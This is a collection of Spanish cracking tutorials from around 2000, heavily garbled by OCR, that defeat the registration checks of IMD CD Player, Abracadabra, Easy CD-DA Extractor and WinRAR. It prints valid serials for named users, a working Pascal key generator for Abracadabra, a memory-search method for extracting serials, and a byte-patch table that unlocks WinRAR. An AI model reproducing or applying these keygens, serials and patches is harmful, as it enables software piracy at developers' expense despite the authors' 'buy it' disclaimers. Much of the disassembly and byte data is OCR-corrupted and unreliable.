seguira ejecutandose como si nada,nos vamos al about y pulsamos sobre Registration,ponemos el name y el serial que 
querais,en mi caso usare Riverwind y de serial 123456,le damos al Ok y como era de esperar nos dice que no vale pa 
na :( bueno,bueno,no desespereis, aceptamos la ventanita y antes de pulsar Ok nos meteremos en el softice con Ctrl+D 
para poner un breakpoint,nosotros utilizaremos este,teclear bpx hmemcpy y luego enter,ahora tendremos que salir del 
softice asi que Ctrl+D y estaremos fuera del softice,ahora tendreis que pulsar sobre Ok con nuestros datos si lo habeis 
hecho bien estaremos de nuevo en el softice,ahora tendremos que localizar la rutina que comprueva nuestro serial falso 
con el auntentico. 


Asta aqui bien no? bueno pues ahora lo que tenemos que hacer es quitar el breakpoint para ello utilizaremos el 
comando bc* y luego enter con esto lo que hareis sera borrar todos los breakpoint que pudierais haber puesto.Como lo 
que queremos es capturar un serial valido pulsaremos F11,ya que de lo contrario le seguiremos la pista al name,ahora 
ya estamos por el buen camino,bien,ahora observar que pone algo asi como USER<O01 >en color verde,esto significa 
que estamos fuera del abracadabra,asi lo que tenemos que hacer es pulsar F12 asta llegar a el,tendreis que pulsar F12 
unas 6 veces,cuando la hallais localizado lo que tendremos que hacer sera tracear el programa asta localizar esto 


0046e76d call 004029fc 

0046e772 imul eax,000007b2 

9946e778 mov esi,eax 

0046e77a cmp esi,(ebp-04)------------ >lleva nuestro serial 

Si habeis llegado hasta aqui felicitaros por que ya teneis vuestro serial,para saber cual es teneis que llegar con f10 hasta 
0046e77a y despues teclear lo siguiente d esi y pulsar enter y en la pantalla de datos tendreis vuestro ansiado 
serial,para que no os perdais os tiene que salir algo parecido a esto.... 


001cad54 0001879380 "LiT" 


Sabeis ya el serial?solo teneis que quitar los ceros y ya tendreis un serial valido,siempre y cuando hallais utilizado mi 
name.Bueno espero que lo hallais entendido,he tratado de explicarme lo mejor que he podido. 


Karpoff Spanish Tutor 


Prog rama IMD CD PLAYER 1.01 e INFOTEL 3.10 


Serial 
PROTECCION: 
. ] Reproductor de CD's 
Descripcion: 

Facilucha 
Dificultad: 

http: //www.ctv.es/USERS/imedia 
DOWNLOAD: (q 0 KK 0 0EO O OQCQ—Q— o 


Softice, W32dasm 


errmentas 


e 2 
RE Yerba Mate ino 16/09/2000 


INTRODUCCION 


Bienvenidos al tercer tutorial. Espero que el segundo haya quedado claro y que hayas obtenido los seriales 
para ' Visual Business Card ' y ' Visual Labels '. En este conseguiremos la clave para Imd cd player 1.01 
con Soft-Ice no sin antes analizarlo con WD32DSM89. Se podría conseguir la clave más fácil y rapidamente 
trabajando solo con Soft-Ice, pero lo que buscamos es aprender. El listado que nos da WD32DSM nos 


permite practicar la lectura de asembler . Las horas que pasemos aprendiendo asembler seran días ahorrados 
a la hora de crackear. 


AL ATAKE 


Corremos el programa vamos a ' help ' ' register' e ingresamos nuestros datos (no hace falta decir que pongas los tuyos ) En mi caso esto es 
lo que puse: 


CDP Registro 
CDP puede ser utilizado durante 30 dias de forma gratuita. 
El uso continuado pasado ese tiempo requiere registrarse. 
CDP no dará aviso cuando el periodo de prueba haya 
concluido, será responsabilidad del usuario registrarse. 
Puede registrarse y conseguir su copia de CDP completa, 
recibiendo por correo electrónico su número de serie, 


de dos formas distintas: 


- Ingresando la cantidad de 1.000 ptas. (o 8$ US) en el 


Número de Serie: (E 


Registrarse 


Le deamos a registrarse y como era lógico nos dice que no es válido. Desensamblamos nuestra vítima con el WD32DSM le damos al botón 
'Sttn 
20 y buscamos nuestro mensaje de error 


"ImmSetCompositionFontá,” 
"ImmSetCompositiorlindow" 
"ImmSetConversionStatus” 
"ImmSetOpenStatus” 
"InitializeFlatSB" 

NA: “Invalid Register.” 
"IsControl" 


"kemel32. dll" 
pl 


"Lista de Pistas" 
U 'm Y d Pp 1 
"Magellan MSWHEEL" 


Doble click en la referencia y nos lleva directamente a lo que vemos 


aaa allas 


|:00454449(C), :0045A45C(C) 


Inmediatamente sobre ' invalid register ' vemos una comparación seguida de un jne pero a no confundirse que eso no nos sirve. Que como lo 


se? Fijate a donde salta (0045A568 ) ' registro inválido '. Lo único que hace es seleccionar el idioma. 
Más arriba tenemos Referenced by (U)nconditional or (C)onditional jump at adresses: 00454449 ,0045A453C . Vamos a ver que 
encontramos en esas posiciones . 


:0045440D 
200454410 
004514415 
:0045441B 
200454420 
004524423 
: 00451426 
:0045242B 
:0045442E 
2004514433 
200451439 
:0045443E 
:00454441 
00454444 


:0045244F 


* Possible StringData Ref from Code 0b3 


2004514452 
: 004514457 
9 00454450 
: 004514462 
:00451467 
2004514464 
:00451446F 
200451471 
00452477 
: 004514479 
:D00452447E 
: 00451483 
00452485 
:00451448B 
:00452448D 
200451492 


4 TE 


2D55F3 
A138594700 
S8BS80E0020000 
ES14F1FCFF 
3B45F8 
SaD55Fc 
ES356F0000 
3D55F3 
1138594700 
2E380E4020000 
ESFE6FOFCFF 
S8B55F8 
BB45Fc 
ES1799FAFF 


B2B45Fc 


BAA4A454500 
ESD499FAFF 
DOFS4FO000000 
A1383D4700 
260000 
4160404700 
S8B00 
S8BES0F0020000 
33DZ 
ESAGEFFCFF 
A16C404700 
38B00 
28B30F4020000 
33D2Z 
ES9Z2EFFCFF 
8D55F3 


a 


lea edx, dword 
mov eax, dword 
mov eax, dword 
call 00429534 

mov eax, dword 
lea edx, dword 
call 00461360 

lea edx, dword 
mov eax, dword 
mov eax, dword 
call 00429534 

mov edx, dword 
mov eax, dword 
call 00403D60 


[ebp-08] 
[00475938] 
[eax+00000ZE0] 


[ebp-08] 
[ebp-04] 


[ebp-08] 
[00475938] 
[eax+000002E4] 


[ebp-08] 
[ebp-04] 


mov eax, dword ptr [ebp-04] 


mov edx, 004545244 


call 00403D60 
je O045A552 


=>"111111111111111" 


mov eax, dword ptr [00473D38] 
mov byte ptr [eax], 00 


mov eax, dword 
mov eax, dword 
mov eax, dword 
xor edx, edx 
call 00429424 
mov eax, dword 
mov eax, dword 
mov eax, dword 
xor edx, edx 
call 00429424 
lea edx, dword 


- o ---. A 


ptr 
ptr 
ptr 


ptr 
ptr 
ptr 


ptr 


ee de 


[0047406C] 
[eax] 
[eax+000002Z2F0] 


[0047406C] 
[eax] 
[eax+000002F4] 


[ebp-08] 


ETA A MAA AA 


Bueno y entonces que hacemos. 


LIA ALI A muuy Edi, UWOLO PL (00/20. J] 


:004524483 SBD0O mov eax, dword ptr [eax] 
00452485 8BS80F4020000 mov eax, dword ptr [eax+000002F4] 
:0045448B 33D2 xor edx, edx 
:0045448D ES92EFFCFF call 00429424 
004514492 SDSS5FS lea edx, dword ptr [ebp-08] pa 
FMATrranr a e oo -.-... A A A CANA AMAIA 
alí » 


v/32Dasm List ... EJlal ES (esas Data (2:00454449 GOffset 00059849h in File:Cdp.exe 


Vemos sobre la 0045A449 se carga un valor en edx otro en eax luego un call 00403D60 (seguramente la rutina de comprobación) 
finalmente nuestro ¡ne 00454552 ( salto a invalid register ). Sobre 0045A45C tambien hay un call 00403d60 . Sin mas demoras pasamos al 


Simbol loader del soft-ice . Abrimos el CDP.exe y le damos al ex y ponemos un bpx0045A444 (si te fijas en el listado anterior veras que se 
detendrá justo despues de haber pasado los valores a los registros ) y nos fijaremos que hay en edx y en eax . Si haces esto verás que en edx 
esta el número ingresado por nosotros y en el eax vemos ' XFPSII111111111' el serial correcto para yerba mate como nombre de usuario . 


EAERERXERERE RARE RARE RARA RR AR RAR ARK A KAR 


NOTA: te acordas que nos pasó en el tutorial anterior cuando intentamos patchearlo, en este nos volvería a pasar Si en el WD32DSM 


pulsamos [Ex veríamos lo siguiente : 


432Dasm Alphabetical List of Imported Functions 


To Search Disassembly for Function, Double Click on Text 


advapi32.RegClosekey 
advapi32.RegCloseKey 
advapi32.RegCreateKeyExó, 
advapi32.RegFlushKey 
advapi32.RegOpenkKeyE xá, 
advapi32.RegOpenKeyEx4, 
advapi32.RegQueryWalueE xó, 
advapi32.RegQueryWalueE xó, 
advapi32. RegSetvalueE xó, 
comctl32.ImageList_4dd 
comctl32.ImageList_BeginDrag 
comctl32.ImageList_Create 
comctl32.ImageList_Destroy 
comctl32.ImageList_DragEnter 
comctl32.ImageList_DragLeave 
comctl32.ImageList_DragMove 
comctl32.ImageList DragShowNolock 


Mia] ES 


Cancel Search | 


= 
Copy All Copy View | 


Fijate en las siguientes funciones RegCreateKeyExA , RegOpenKeyExA , RegOpenQuerryValueExa ; si patcheáramos el salto condicional 
nos diría que el número es correcto pero al correrlo otra vez volveríamos a estar no registrados. Esto es debido a que cuando nos acepta el 
serial ,guarda en el registro del sistema el nombre y el número de serie (falso) y cuando lo volvemos a correr comprueba que no son correctos 
. Si ejecutas el REGEDIT veras en HKEY_CURRENT USER/Software/CDP/CDPRegister lo que te estoy diciendo. Para hacer esta prueba 
sin patchear cuando estes en el soft-ice en la posición 00454449 ¡ne 0045a552 tipea r fl z e invertirás el salto luego pulsas ' F5 '. 


£* Editor del Registro 
Registro Edición Wer Ayuda 


5-43 CDP -IMD CD Player 
(EY CDP Info 
(3 CDP Options pa 
(3 CDP Preferences 
¿3 CDP Register 
(29 CDP State 
(3 Cerious Software Inc. 
Y Cíb 
a 


Mi PCAHKEY_CURRENT_USERiSoftwareiCDP - IMD CD PlayerxCDP Register Lo 


[valor no establecido) 
2FP511111111111" 
"verba mate" 


HARAN AA 


Tranquilo!!! todavía no lo registres. Si no aguantaste más y ya lo registraste, corre el regedit busca la rama que recién mencionamos y 
eliminala para volver a estar como antes (si queres antes de borrarla , hace click en archivo y exportala ). Al comenzar decíamos que se podía 
hacer mas rápido solo con Soft-Ice, vamos a ver si es verdad. 


Hasta ahora lo único que hemos hecho con el Soft-Ice era arribar a posiciones de memoria específicas previamente analizadas con el 
WD32DSM. Ahora haremos algo distinto. Volvemos a cargar nuestros datos (los falsos ) en el programa y 'Control-D" mediante pondremos 
un bpxhmemcpy en el Soft-Ice. Bpxhmemcpy tiene un pro y una contra. El pro es que entra sin problemas en casi todos los 
programas, la contra es que no entra en un lugar específico por lo que tendremos que buscar un poco. Hecho 
esto pulsamos aceptar y entramos en el Soft-Ice. Pero como decíamos estamos en el 'user' (como se puede ver en la línea verde inferior ). 
Desactivamos el breakpoint con bc* . Vamos pulsando F'12 (esto es viajar de ret en ret) y vamos mirando en que lugar del programa estamos. 
Luego de pulsar F12 siete veces arribamos a cdp!code . Y ahora que ???. Seguimos pulsando F12 hasta ver algo interesante ( call, test, cmp 
seguidos de un salto condicionado ) o bien vamos contando cuantas F12's oprimimos hasta pasarnos y que aparezca el mensaje de error,hecho 
esto volvemos a hacer lo mismo pero apretando F12 una vez menos.  Mmmmmm....me parece que lo explique en japonés ;-). Hagámoslo 
juntos. Ponemos nuestros datos, ponemos el breakpoint y pulsamos aceptar. Entramos en el Soft-Ice. Borramos el breakpoint con bc*. 
Oprimimos F12 siete veces y llegamos a cdp!code. Una vez allí si oprimimos F12 seis veces más nos aparece el mensaje de error. Por lo que 
repetiremos lo anterior pero pulsando F12 solo cinco veces más. Hecho esto aparecemos en: 


0167:0045A41B E314F1FCFF CALL 00429534 (ver 2* gráfico WD32DSM) 


A partir de allí trazamos con FI0 y nos fijamos que hay en los regitros . Al llegar a 0167:0045A444 vemos el serial correcto. Sin duda fue 
mucho más simple. 


Ahora sí, por fín, la tan esperada y nunca bien ponderada sección (¿?) ahora te toca a vos. En la misma dirección donde bajaste este 
programa, podrás bajarte ' INFOTEL 3.10 '. Con Soft-Ice poniendo un bpx hmemcpy tendrás que encontrar el serial correcto. 


Por dudas o comentarios comunicate a http://yerbamatearO yahoo.com 


Espero que este tutorial te haya sido útil, nos vemos en el próximo 


Yerba Mate 


* Todo es fácil cuando se sabe como" 


IMPORTANTE: Lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, NO como robar alguna propiedad. 
Si vas a usar estos programas debes comprarlos 


Karpoff Spanish Tutor 


Programa: Abracadabra 1.2.6 (28.07.99) 
Otra aproximación 


PROTECCION: Name / Serial 
Descripcion: Un original 'explorer' para Windows 
Dificultad: Principiante 


DOWNLOAD: http://www. lighttek.com 
Herramientas: Softice 
CRACKER: MeGaBiTe FECHA: 22/09/ 2000 


INTRODUCCION 


Bueno el propósito de éste tutorial es profundizar un poco más en otro tutorial publicado en éste site: 
el del día 07/09/2000 escrito por 'Riverwind'. Pudiéramos decir que es su continuación natural. Dicho 
tutorial se limita a 'olisquear' un Serial Number; en éste vamos a intentar crear un Key Generator. 
Por lo demás es harto sencillo. ¡Nada del otro mundo! 


El programa, por su parte, es una especie de Explorer muy 'sui generis'. Quiero decir que es un poco 
rarillo. En uno de los laterales, ya que esto es configurable, aparece el típico árbol de directorio y en 
el lado contrario se van visualizando los ficheros; si pinchamos en un ejecutable, lo ejecuta; si lo 
hacemos en un fichero de texto, visualiza el texto (si es un documento Word, pues lo mismo, para él 
sigue siendo texto), si es una imágen, la muestra y si se encuentra con cualquier otro tipo de fichero 
más extraño, simplemente lo muestra ¡En fin! ¡Cosas veredes buen Sancho ...! 


AL ATAKE 


Bueno, nosotros a lo nuestro. Como se indicaba en el tutorial de 'Riverwind' la protección consiste en un 
'Name' y un 'Registration Code' que se nos exigen tanto al arrancar la aplicación como en el momento de su 
descarga. Nos muestra la siguiente pantallita: 


Abracadabra is "Shareware". This means that we 
have made the software available to you for free 
evaluation. You are entitled to evaluate the software 
for up to 30 days without obligation to pay. 


After 30 days. if you decide to keep the software, 
you must register your copy for a small fee. 


HAnw to register? 


First step: Payment via Internet or other ways (see 
readme.bd): 


Online Registration 


Second step: When you receive your registration 
code from author, enter name and code in fields: 


Name: 


Remind me later 


Bien, vamos a introducir algo a ver qué pasa. Ponemos 'MeGaBiTe' como 'Name' y 'u1193046' y pulsamos el 
botón 'Ok'. ¡Coño! ¡Miren lo que nos dice! 


¡Vaya! Podemos deducir de aquí que se espera que el 'Registration Code' sea un entero. Bueno, bien está si 
así os place. Vamos a introducir un entero. Ponemos 'MeGaBiTe' como 'Name' y '1193046' como 'Registration 
Code' y nuevamente pulsamos el botón 'Ok'. ¡Ahora aparece el mensaje de error! Esta es la pantalla: 


Invalide registration name or code. Try again. 


Bien, seamos obedientes y sigamos su consejo: intentémoslo de nuevo. Volvemos a introducir la información 
anterior pero ésta vez antes de pinchar en el botón 'Ok' vamos a poner un breakpoint en la función API 
'hMemCpy". Para ello lanzamos en primer lugar nuestro queridísimo Softl CE pulsando Ctrl-D y escribimos 
"BPX HMEMCPY". Después pulsamos F5 y volveremos a la pantalla del programa. Ahora ya estamos listos 
para pinchar en el botón 'Ok'.Bien, ¡vamos allá! 


Softl CE hará break. Comoquiera que se llama cuatro veces a la función 'hKMemCpy' tendremos que pulsar F5 
tres veces y después pulsar F12 hasta que lleguemos al módulo del programa. SoftlCE nos indica qué módulo 
se está ejecutando mostrándonos su nombre en la parte superior de la ventana Command. En el caso que nos 
ocupa tendremos que ver lo siguiente: 


ABRA!CODE+0006D741 


Bien. Una vez veamos ésto, nos encontraremos con el siguiente trozo de código: 


0177:0046E741 CALL 004226E4 

0177:0046E746 XOR ESI,ESI >Aterrizamos aquí 

0177:0046E748 MOV EAX, [EBP-08] >Pone nuestro Name en EAX 

0177:0046E74B CALL 00403C0C >Calcula la longitud del Name 
0177:0046E750 TEST EAX,EAX >Comprueba que hayamos puesto algo en Name 
0177:0046E752 JLE 0046E767 >Si no hemos puesto nada, salta 


Bueno con éstas líneas lo que se está comprobando es que hayamos introducido un Name. Si no hemos 
introducido ninguno se producirá un salto. Como ése no va a ser nuestro caso, puesto que queremos 
registrarnos con nuestro Name, seguimos. Ahora nos cruzamos con éste otro trozo de código: 


0177:0046E759 MOV ECX, [EBP-08] >Se pon 1 Nam n ECX y se 
>inicia el bucle que calcula el 
>Serial Number 
0177:0046E75C MOVZX ECX,BYTE PTR [EDX+ECX-01] >El byte al que apunta la 
>dirección [EDX+ECX-01] es 
>el primer carácter de 
>nuestro Name; después se 
>incrementa pasando al 
>siguiente, etc 


0177:0046E761 ADD ESI,ECX >ESI actúa de sumatorio de los 
>valores ASCII de los distintos 
>caracteres que componen el Name 

0177:0046E763 INC EDX >Incrementa el índice 

0177:0046E764 DEC EAX >EAX contiene la longitud de 
>nuestro Name; se decrementa 

0177:0046E765 JNZ 0046E759 >¿Hemos llegado al final del Name? 
>Si no es así, se reinicia el bucle 

0177:0046E767 MOV [EBP-14],ESI >Mueve el sumatorio a [EBP-14], lo 


>cual machaca nuestro Registration 
>Code que estaba guardado allí. No 
>tiene importancia, el programa 
>también lo tiene guardado en 
>[EBP-04] como se verá después 

0177:0046E76A FILD DWORD PTR [EBP-14] >Convierte el entero en un número 

>real 

0177:0046E76D CALL 004029FC >Esta función devuelve el sumatorio 

>que antes teníamos guardado en ESI 

>en el registro EAX 

0177:0046E772 IMUL EAX,EAX,000007B2 >Aquí está la madre del cordero; 
>multiplica nuestro sumatorio por 
>la constante '7B2' (hexadecimal, 
>por supuesto) lo cual dá como 
>resultado el Registration Code 


>auténtico 
0177:0046E778 MOV ESI,EAX >Guarda el resultado de la 
>multiplicación en el registro ESI 
0177:0046E77A CMP ESI, [EBP-04] >Y lo compara con lo que tenemos en 


>la dirección apuntada por [EBP-04] 
>que, como decíamos antes, también 
>contiene nuestro Registration Code 


>falso 
0177:0046E77D JNZ 0046E88C >El salto 'buen chico/mal chico' 


Bueno, parece que todo está bastante claro. Y bastante sencillo. Lo único que tenemos que hacer es saber 
cuál es el valor guardado en el registro ESI cuando lleguemos a la instrucción guardada en la posición 
'0046E77A'. Para ello, sencillamente, en la ventana Command de Softl CE escribimos: '? ESI', y ¡ya está! Por 
si alguien siente curiosidad el Registration Code para mi Name (recuerde, 'MeGaBiTe') es '1382940'. ¡Por 
favor, no use el mío! Sea un poco aplicado y obtenga el suyo propio. Una vez registrado el programa guarda 
los datos en la siguiente clave del registro de Windows: 


HKEY_CURRENT_USERSoftwarelLighttekl Abracadabra 


Esta 'key' tiene dos entradas: 'usercode' y 'usename*. Con eliminar el valor de ésta última entrada el 
programa volverá a su estatus de 'unregistered!. 


Como se puede ver el código es harto simple. Se van sumando los valores ASCII de todos los caracteres de 
nuestro Name y el resultado de dicha suma se multiplica por la constante '7B2' hexadecimal y, ¡¡LISTO!! 


Ahora vamos a escribir un pequeño KeyGen. Aquí tenemos el código escrito en Pascal. 


Program abraKG; 
Uses Crt; 


Var nombre : String[20]; 


3 : byte; 
serial : longlnt; 
Begin 


ClrScr;TextColor (White) ;¡Write('Key Generator by '); 
TextColor (LightRed) ¿¡Write('MeG');TextColor (Yellow); 
Write('aB');TextColor (LightRed) ¿¡Writeln('iTe'); 
TextColor (15);¿writeln('Abracadabra v1.2.6');¡Writeln; 
TextColor (7) ;Write('Introduzca su nombre: '); 
TextColor (15) ;ReadLn (nombre) ; 
for i := 0 to length(nombre)-1 do 

begin 

serial := serial+ord(nombre[i+1]) 

end; 
serial := serial*$7B2; 
TextColor (7); 
write('Su Registration Code: '); 
TextColor(15);Write (serial); 
ReadKey 
End. 


¡Bueno! Esto es todo, amigos. Hasta el próximo tutorial. 


Y, para quienes todavía sean reticentes a escribir y compilar éste código, aquí tenemos éste sencillo formulario: simplemente 
basta con pulsar en el botor 'Generar". 


Nombre de usuario: 
Registration Code: [>] 


Generar Registration Code 


Me gustaría saludar a mis crackers favoritos y de los que más he aprendido. 


Son éstos: Torntdo, The SandMan, BalckB, +Fravia, TNT!, ECD, Karpof, Wkt. Esto no quiere decir que no haya otros 
extraordinarios crackers. 


NOTA: Si le gusta el programa, cómprelo. Los programadores pierden demasiado tiempo desarrollando su software como 
para que vengamos nosotros y no les compensemos por su trabajo. ¡No es justo! 


Ensayo por: MeGaBiTe 
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Programa: Easy CD-DA Extractor 3.0.6 


PROTECCION: O e e 
Descripcion: Transforma pistas de audio a varios formatos (mp3, wav, wma ....) 
Dificultad: | Principiante 

DOWNLOAD : A 
Herramientas: | Softice v4x 

ra AP FECHA: [22/09/2000 


INTRODUCCION 


Este programa es muy útil para pasar CD audio a ficheros comprimidos mp3, destinado a 
ahorrar espacio ya que se puede grabar 7 cds en 1 solo, bueno vosotros ya le 
buscareis el uso. 

El estudio de este programa se va a enfocar en el método denominado por el maestro 
+ORC, "memory echo trick", traducido, algo asi como el truco del eco en la 

memoria... 


| AL ATAKE 


Se debe se seguir estos para que salga bien: 


1- Al cargar el programa sale que no estamos registrados, nos da un tiempo limitado del uso 
del programa y la posibilidad de registrarlo, mediante nombre y serial. 


2- Tenemos, ahora que introducir un nombre y un serial cualquiera. Nos da el mensaje de 
error. 


3- Cargamos el Soft-Ice, hacemos un breakpoint: bpx hmemcpy ( el mejor ). 


4- En el programa Easy CD-DA Extractor, volvemos a intentar registrarnos, le damos a aceptar 
para que compruebe el serial, pero CUIDADO debe tener EL MISMO NOMBRE QUE ANTES !!!!!!! 
Rapidamente saltamos en el SI, lo que tenemos que hacer es ir ahora al programa objetivo, le 
damos repetidamente a F12 hasta llegar a: 

asy..! ( o algo asi, vosotros ya lo vereis ) 


5- Ahora es donde realmente viene el truco: en vez de ponernos y haber donde salta como se 
compara en serial y todo eso, vemos si hay algun rastro en la memoria de nuestro nombre 
introducido y nuestro serial chungo: 

La función a usar en el SI : s 30 1 ff£ffffff "xxxxx" ¿donde xxXXxXxXxX es el nombre usado. 

Al darle al enter, nos da resultado y vemos: 

NUESTRO NOMBRE 

NUESTRO SERIAL CHUNGO 

¿SERIAL CORRECTO? =====>> algo que empieza por EZCDDAX3-........ algo sospechoso, no? ;-) 

Si esto no os sale, buscar más veces en la memoria con el comando: s ¿en el SI, hasta que os 


aparezca. 


6- El serial encontrado, será el correcto?, ponemos el mismo nombre de siempre, y con el 
serial encontrado. Al hacerlo el programa no nos da las gracias ni nada, pero cuando salimos 
del programa y lo volvemos a cargar, no nos sale nada de introducir serial, ni de limite de 
tiempo =>ESTAMOS REGISTRADOS. 


NOTA 1: Primero decir que esto es para el estudio de la protección del programa, para poder 
evaluarlo mejor, y que si os gusta, debeis comprarlo! ;-) 


NOTA 2: Debeis seguir los pasos, de 1% introducir nombre y que nos de el error, y 2%, cuando 
hacemos el bpx debe ser con el mismo nombre también, ya que si no esto no sale. 


sobre 
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Programa: WinRar 2.70 beta 1 


PROTECCION: Archivo LLave 


Descripcion: Utilidad Compresion. 
Dificultad: Aficionado 
DOWNLOAD : cualquier pagina de shareware 


Herramientas: Softlce 3+, IDA Pro, Hacker"s View 


CRACKER: 'VIPER | FECHA: 22/09/2000 


INTRODUCCION 


Tras un pequeño lapso en mi produccción de tutoriales (debido a mi ocupación en file 
insPEctor) vuelvo a la carga con un programa mas bien poco dificultoso, pero que 
encierra en si algunas peculiaridades que merecen la creación de un tutorial. Sin mas 
preámbulos pasemos a meternos manos a la obra. 


AL ATAKE 


Para comenzar con la tarea empezaremos revisando la información que contiene la cabezera del 
ejecutable, y que mejor programa para esta tarea que mi flamante file insPEctor 2.0. Veamos 
los resultados obtenidos: 


eN file insPEctor 2.0 


á Herramientas | Acerca de... | 


Reconocimiento de signaturas 


Compilador; Borland C++ for Win32 1995 (1) 
Packer: No encontrado 


Encriptador: No encontrado 


Versión de la librería: fi 0 Información... 


Versión del enlazador: [2.25 Versión de la imágen: fo.o 
Versión del SO; [a 0 Versión del Subsistema: fa.o 


(3 Abrir archivo Ey Analizar (J Salir 


[C:iqUtilidadyWinRar|WinRAR .exe 


Pues bien, la sección que nos importa de la valiosa información que muestra file insPEctor 
es la de reconocimiento de signaturas, que nos revela con que ha sido compilado o procesado 
nuestro objetivo, como veis el resultado es totalmente inofensivo: Borland C++. 


Por el momento las cosas no se complican demasiado, no hay ningún empaquetador presente, lo 
que evita tener que llevar a cabo procesos de desempacado o la creación de cargadores. 


Primer ataque 


En contra de lo que muchos piensan, el primer ataque no se hace ni con Softlce no con IDA, 
sino simplemente cargando el programa, analizando su protección y buscando puntos de ataque. 
En este aspecto WinRar nos obsequia con un sistema basado en un archivo llave, cuya 
presencia en la carpeta del programa desbloguea todas las funcionalidades del programa y 
elimina las nags. Podemos confirmar esto mediante dos características del programa: 

1.- El programa puede registrarse pero no hay código de desbloqueo ni nada parecido. 

2.- Si monitorizamos con FileMonitor descubrimos que se busca un archivo llamado rarreg.key. 
Pero sii hay algo que llama la atención en este programa es la frase que se encuentra junto 
al nombre en la barra de título: 


'¡=Archivos de programa - WinRAR (evaluation copy) 
File Commands History Favorites Options Help 


Pues si, esa va a ser nuestra llave de acceso a los entresijos de la protección de este 
programa, así que ha llegado la hora de usar una de mis herramientas favoritas: IDA Pro. 


Una vez desensamblado el programa en cuestión vamos al diálgo que contiene las cadenas y 
buscamos... un momento, si nos fijamos la barra de título contiene una peculiaridad: primero 
se muestra el nombre del directorio que exploramos, luego el nombre del programa y 
finalmente el fatídico "(evaluation copy)"; todo esto nos obliga a buscar la siguiente 
cadena: 


$s -= Winrar 
Donde %s contiene el directorio que WinRar decide que ha de mostrarse... exacto!, hemos 


encontrado justo esa referencia, veamos a donde nos conduce... 


0041B930 push eax 

0041B931 push offset aSWinrar ; "Ss — WinRAR" 
0041B936 lea edx, [ebp+var_200] 

0041B93C push edx 

0041B93D call _sprintf 


0041B942 add esp, 0Ch 

0041B945 cmp byte ptr ds:dword_465CAC, O 
0041B94C jnz short loc_41B97C 

0041B94E push 369%h 

0041B953 call sub_4080CC 

0041B958 push eax 

0041B959 push offset aS_7 ; " (%Ss)" 
0041B95E lea ecx, [ebp+var_200] 

0041B964 push ecx 

0041B965 call _strlen 


Oooops!, tenemos aquí varias líneas muy sospechosas. Si analizamos la ejecución de estas 
pocas líneas veremos que primero se concatenan el nombre del directorio y el " -— WinRar", 
pero luego un salto condicional decide si tiene o no que agragarse el "(evaluation 
version)". Pero bien, ¿que condiciona ese salto?, pues un byte (en el offset 465CAC) que 
continene 0 si no estamos registrados y 1 si lo estamos... lo que el programador ha hecho es 
algo tan sencillo como esto: 


bool EstaRegistrado = false; 
if (ComprubaSiEstaRegistrado (void) == true) then (EstaRegistrado = true) else 
[EstaRegistrado = false); 


if (!EstaRegistrado) then (MuestraNag (void) ); 


Bueno, quizás esta penosa demostración de mis patéticos conocimientos de C haya ilustrado lo 
que el programador ha llevado a cabo a la hora crear un sistema de registro para WinRar. 
Pero todavía queda por hacer, que nadie se duerma en los laureles. 


La técnica a usar para anaiquilar estos esquemas de protección es muy sencilla: simplemente 
hay que usar el comando bpm de Softlce. Con este comando Softlce se detendrá al detectar un 
acceso de lectura o escritura en la dirección especificada, veamos la sintaxis: 

bpm 465CAC W 


Solo puntualizar que la W especifica que solo se monitorizen las escrituras en esa 
dirección, y no las lecturas. 


Falseando variables 


Abrimos el loader del SoftlIce, cargamos WinRar y cuando se detenga al inicio del programa 
escribimos el breakpoint anteriormente citado, tras lo cual dejamos correr el programa, y 
SoftlIce se detiene en: 

00426195 push 0 

00426197 call sub_43BC98 

0042619C mov byte ptr ds:dword_465CAC, al 

004261A1 push ebx 


En mi opinión, lo mas correcto sería insertar un "mov al, 1" en 00426195, rellenar con nop's 
los 5 siguientes bytes hasta eliminar por completo la llamada que se hace. De esta forma 
siempre se moverá a esta posición de memoria un 1 (el valor que nos interesa...). 


Así que ponemos un breakpoint en 00426195, reiniciamos el programa e introducimos los 
opcodes ya mencionados. Dejamos al programa correr y nos encontramos con otro intento de 
modificar nuestra variable salvadora... el procedimiento a seguir es exáctamente el mismo, 
con la peculiaridad de que ahora hay que poner un breakpoint antes de la llamada, reiniciar, 
volver a modificar el primer chequeo y parchear el 


2% también (el cual no se ejecutará si el primero falla). Tras este lio de breakpoints 
continuamos con la ejecución todo parece ir de perlas, pero si seleccionamos un archivo 
pulsamos el botón ADD caemos en un tercer intento de jodernos, pero ahora con otro esquema: 


0040EF08 cmp byte ptr ds:dword_465CAC, 0 
0040EFOF 3jz short loc_40EF21 

0040EF11 cmp ds:byte_478284, O 

0040EF18 jnz short loc_40EF21 

0040EF1A mov byte ptr ds:dword_465CAC, 0 


0EF21 mov ds:dword_4700C4, 1 
O0EF2B cmp ds:byte_4700B6, 0 
0040EF32 3jz short loc_40EF58 
0EF34 push 0 

0EF36 push 73h 


Si se traza con Softlce es bastante sencillo darse cuenta de que todo el tomate está en 
0040EF18, que puede y debe ser sobreescrito con un jmp 40EF21. Por el momento fin de la 
historia..... 


Y digo por el momento por que este programa incluye una peculiar opción, que no es ni mas ni 
menos que "Put Authenticity Verification". Esta opción está en el menú de ADD y añade al 
archivo el nombre del usuario registrado para fines que yo, al menos, desconozco. 


Pues bien, al comprimir un archivo usando esta opción todo va de maravilla, hasta que 
decidimos descomprimirlo, donde recibimos un mensaje que dice algo así como "Authenticiti 
Verification Failed"... evidente!, ya que si vamos al manú About nos encontramos con la 
frase "Registered to ". Esto quiere decir que el programa busca una AV inexistente, lo que 
produce un ERROR. 


Mi solución (mas bien chapuza) para solucionar esto es eliminar esta opción usando Resource 
Hacker o bien atacando la cabezera de recursos directamente si se tiene habilidad 
suficiente. La primera opción es realmente sencilla y no merece la pena comentarla, solo 
puntualizar que para que todo funcione, hay que eliminar por completo el control, nada de 
ocultarlo o desactivarlo. 


Resumiendo 


Para finalizar aquí va una tabla con todos los puntos del programa a modificar, para 
disuadir posibles dudas... 


Dirección Original Crackeado 
(00426195 GAOOESFCSAOIOO  BOOI9O9099090 
10041AB82 6A 01 E8 OF 11 02 00 ¡BO 01 90 90 90 90 90 

DOADEF1E Ig ESOO 


Bueno, pues ya solo queda usar Hackers View o cualquier editor hexadecimal para modificar 
los bytes pertinentes. Espero que nadie se limite simplemente a mirar esta tabla y crackear 
el programa sin prestar atención al tutorial en si... 


Pues bien, aquí termina este corto pero intenso tutorial sobre una herramienta interesante 
tanto desde el punto de vista del usuario como del cracker. Espero que este documento sirva 
de ayuda al mayor número de crackers posible y despeje cualquier duda sobre la protección de 
